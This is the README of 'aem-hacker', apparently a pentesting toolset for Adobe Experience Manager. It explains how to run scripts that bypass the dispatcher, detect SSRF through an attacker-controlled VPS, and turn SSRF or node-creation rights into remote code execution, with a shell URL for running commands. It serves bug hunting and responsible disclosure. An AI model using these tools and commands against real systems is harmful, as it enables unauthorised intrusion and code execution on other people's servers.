0ang3el / aem-hacker

MIT License
769 stars 166 forks source link

Toolset for AEM hacking

Tools to identify vulnerable Adobe Experience Manager (AEM) webapps. AEM is an enterprise-grade CMS.

I've built these tools to automate bughunting and pentesting of AEM webapps. I've included checks for previously known vulnerabilities and misconfigurations, as well as for new ones, discovered by me in 2018/2019. All discovered vulnerabilities were responsibly reported to Adobe PSIRT.

You can find more details about vulnerabilities and techniques in presentations, I've prepared for Hacktivity conference and LevelUp 0x03.

AEM webapps are widespread and rarely configured securely or kept up to date. Bughunter, you have good chances to find security bugs, enjoy the tools!

Mikhail Egorov (@0ang3el)

Scripts

aem_hacker.py

Important: You need a VPS to detect SSRF vulnerabilities!

Tool tries to bypass AEM dispatcher.

Following checks are currently implemented:

Help

usage: aem_hacker.py [-h] [-u URL] [--proxy PROXY] [--debug] [--host HOST]
                     [--port PORT] [--workers WORKERS]
                     [-H [HEADER [HEADER ...]]] [--handler HANDLER]
                     [--listhandlers]

AEM hacker by @0ang3el, see the slides -
https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     url to scan
  --proxy PROXY         http and https proxy
  --debug               debug output
  --host HOST           hostname or IP to use for back connections during SSRF
                        detection
  --port PORT           opens port for SSRF detection
  --workers WORKERS     number of parallel workers
  -H [HEADER [HEADER ...]], --header [HEADER [HEADER ...]]
                        extra http headers to attach
  --handler HANDLER     run specific handlers, if omitted run all handlers
  --listhandlers        list available handlers

Usage

python3 aem_hacker.py -u https://aem.webapp --host your_vps_hostname_ip

or

python3 aem_hacker.py -u https://aem.webapp --host your_vps_hostname_ip --handler groovy_console --handler salesforcesecret_servlet

aem_discoverer.py

Script allows to scan urls and find AEM webapps among them.

Tool tries to bypass AEM dispatcher.

Help

python3 aem_discoverer.py -h
usage: aem_discoverer.py [-h] [--file FILE] [--proxy PROXY] [--debug]
                         [--workers WORKERS]

AEM discoverer by @0ang3el, see the slides -
https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps

optional arguments:
  -h, --help         show this help message and exit
  --file FILE        file with urls
  --proxy PROXY      http and https proxy
  --debug            debug output
  --workers WORKERS  number of parallel workers

Usage

python3 aem_discoverer.py --file urls.txt --workers 150

aem_ssrf2rce.py, aem_server.py, response.bin

Helps to exploit SSRF in SitecatalystServlet and AutoprovisioningServlet as RCE. It should work on AEM before AEM-6.2-SP1-CFP7 running on Jetty (default installation).

Help

python3 aem_ssrf2rce.py -h
usage: aem_ssrf2rce.py [-h] [--url URL] [--fakeaem FAKEAEM] [--proxy PROXY]

optional arguments:
  -h, --help         show this help message and exit
  --url URL          URL for SitecatalystServlet or AutoprovisioningServlet,
                     including path, without query part
  --fakeaem FAKEAEM  hostname/ip of fake AEM server
  --proxy PROXY      http and https proxy

Usage

Place aem_server.py and response.bin on your VPS. Run aem_server.py script.

python3 aem_server.py
starting fake AEM server...
running server...

Run aem_ssrf2rce.py script.

python3 aem_ssrf2rce.py --url https://aem.webapp/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet --fakeaem your_vps_hostname_ip

If RCE is possible, you should see incoming connection to your fake AEM server. After replication, you can access your shell from https://aem.webapp/rcenode.html?Vgu9BKV9zdvJNByNh9NB=ls.

aem-rce-sling-script.sh

Script is handy when Felix Console is not available, but you have permissions to create new nodes under /apps JCR node.

Usage

./aem-rce-sling-script.sh https://aem.webapp username password